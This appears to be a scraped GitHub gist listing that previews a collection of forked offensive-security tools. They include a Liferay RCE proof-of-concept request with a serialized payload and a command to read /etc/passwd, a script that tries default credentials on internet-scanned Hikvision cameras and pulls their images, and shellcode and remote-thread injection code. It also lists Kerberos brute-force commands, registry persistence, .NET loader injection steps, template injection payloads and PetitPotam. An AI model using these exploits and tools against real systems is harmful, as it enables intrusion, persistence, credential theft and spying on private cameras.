MITRE ATT4CK - T1132 - Data Encoding
| Base64 Code | Decoded (. = 0x00) | Description | MITRE ID |
|---|---|---|---|
| JAB | $. | Variable declaration (UTF-16) | T1086 |
| TVq | MZ | MZ header | T1001 |
| UEs | PK | ZIP, Office documents | T1001 |
| SUVY | IEX | PowerShell Invoke Expression | T1086 |
ashr ashr
ashr
/ Base64_CheatSheet.md
Created
October 24, 2019 21:31
— forked from Neo23x0/Base64_CheatSheet.md
Spot Malicious Base64 Encoded Code
ashr
/ ImageFileExecutionOptions.ps1
Created
January 13, 2020 13:02
— forked from netbiosX/ImageFileExecutionOptions.ps1
Image File Execution Options Injection - Persistence Technique
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| ImageFileExecutionOptions v1.0 | |
| License: GPLv3 | |
| Author: @netbiosX | |
| #> | |
| # Image File Execution Options Injection Persistence Technique | |
| # https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/ | |
| function Persist-Debugger |
ashr
/ hikvision-scrape.sh
Created
February 12, 2020 04:17
— forked from smidgedy/hikvision-scrape.sh
This abomination pulls Hikvision NVR/DVR systems out of masscan output JSON, checks them for default creds, and dumps still images from any system it can access to aid identification. Runs faster if you have GNU Parallel. This is what happens when you start a project as a bash one-liner because opening vscode is too much effort.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Masscan - common ports are 80, 81, 8000, 8080, 8081, 8090, 8888, 9000, 9001 | |
| # I do it like this: | |
| # sudo masscan --banners --source-ip <IP not in use on your network> --rate <how fast you can scan>\ | |
| # -iL <list of CIDR to scan> -p <that list of ports above> -oJ <output file.json> | |
| # Output filenames | |
| HIKVISION_LIST_DEFAULT='hikvision-default.txt' | |
| HIKVISION_LIST_NON_DEFAULT='hikvision-nondefault.txt' |
ashr
/ AngularTI.md
Created
April 20, 2020 12:42
— forked from mccabe615/AngularTI.md
Angular Template Injection Payloads
ashr
/ _Instructions_Reproduce.md
Created
April 29, 2020 10:54
GhostLoader - AppDomainManager - Injection - 攻壳机动队
GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
ashr
/ EtwpTest.cs
Created
May 8, 2020 08:40
— forked from TheWover/EtwpTest.cs
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace EtwpTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
ashr
/ kerberos_attacks_cheatsheet.md
Created
May 11, 2020 09:08
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
ashr
/ CreateRemoteThreadDInvoke.cs
Created
October 8, 2020 13:34
— forked from Flangvik/CreateRemoteThreadDInvoke.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace InjectionTest | |
| { | |
| public class DELEGATES | |
| { |
ashr
/ LiferayRCE(CVE-2020-7961).md
Created
February 5, 2021 06:15
— forked from pikpikcu/LiferayRCE(CVE-2020-7961).md
POC Liferay RCE(CVE-2020-7961)
POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close
cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F63
ashr
/ PetitPotam.py
Created
August 12, 2021 16:08
— forked from micahvandeusen/PetitPotam.py
PetitPotam.py modified to use EfsRpcDecryptFileSrv not EfsRpcOpenFileRaw
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # Author: GILLES Lionel aka topotam (@topotam77) | |
| # Modified by: Micah Van Deusen (@micahvandeusen) | |
| # Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo), shutd0wn(@ _nwodtuhs) | |
| # "Most of" the code stolen from dementor.py from @3xocyte ;) | |
| import sys | |
| import argparse |